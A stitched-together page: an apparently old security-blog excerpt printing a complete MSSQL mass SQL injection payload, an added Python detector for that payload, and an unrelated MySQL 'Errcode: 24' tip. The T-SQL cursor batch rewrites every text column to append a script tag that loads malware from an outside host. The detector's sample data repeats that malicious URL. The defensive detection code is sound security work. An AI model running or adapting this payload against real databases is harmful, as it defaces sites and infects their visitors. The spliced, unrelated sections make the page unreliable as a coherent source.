TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
    select a.name, b.name from sysobjects a, syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.domain.com/malware/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.domain.com/malware/w.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
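As an added example (not code from the original post), here is a defender-side check in Python built from the sample above: it flags requests that carry the cleartext cursor batch and strips the appended script tail from stored values. The log lines, the table and column names, and the assumption that the batch arrives in the query string are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Keywords from the payload shown above; a request must contain all of them.
CURSOR_TOKENS = ("declare", "cursor for", "sysobjects", "syscolumns", "exec(")

# Tail the payload appends to each text column:
#   "></title><script src="URL"></script><!--
INJECTED_TAIL = re.compile(
    r'"></title><script\s+src="?\s*([^"\s>]+)\s*"?></script><!--',
    re.IGNORECASE,
)


def normalize(text):
    """URL-decode twice (covers double encoding), collapse whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(text))
    return re.sub(r"\s+", " ", decoded).lower()


def is_cursor_injection(request_line):
    """True if the request carries the cleartext catalog-walking batch."""
    norm = normalize(request_line)
    return all(token in norm for token in CURSOR_TOKENS)


def clean_value(value):
    """Return (value without injected tails, list of script URLs removed)."""
    urls = INJECTED_TAIL.findall(value)
    return INJECTED_TAIL.sub("", value), urls


# Constructed sample data (not from a real incident); the batch is truncated.
SAMPLE_REQUESTS = [
    "GET /news.asp?id=12 HTTP/1.1",
    "GET /search.asp?q=declare+cursor HTTP/1.1",
    "GET /news.asp?id=12;DECLARE%20@T%20varchar(255)%20DECLARE%20Table_Cursor"
    "%20CURSOR%20FOR%20select%20a.name,b.name%20from%20sysobjects%20a,"
    "syscolumns%20b%20...%20exec('update%20...') HTTP/1.1",
]
SAMPLE_ROWS = {
    ("news", "title"): 'Annual report"></title><script src="http://www.domain.com'
                       '/malware/w.js"></script><!--',
    ("news", "author"): "J. Smith",
}

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(is_cursor_injection(line), line[:60])
    for (table, column), value in SAMPLE_ROWS.items():
        cleaned, urls = clean_value(value)
        if urls:
            print(f"{table}.{column}: removed {urls} -> {cleaned!r}")
```

The request check matches only the cleartext form shown on this page, so treat it as one signal next to parameterized queries and a least-privilege database login, not as a filter.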


Racker Hacker » MySQL: Errcode: 24 when using LOCK TABLES


There are two ways to fix the problem. First, if you find that you only hit the limit during mysqldump runs and never during normal database operation, just add --single-transaction to your mysqldump command-line options. This will cause MySQL to keep only one table open at a time.

However, if this happens while backups aren’t running, you may want to increase the open_files_limit in your MySQL configuration file. By default, the variable is set to 1,024 open files.
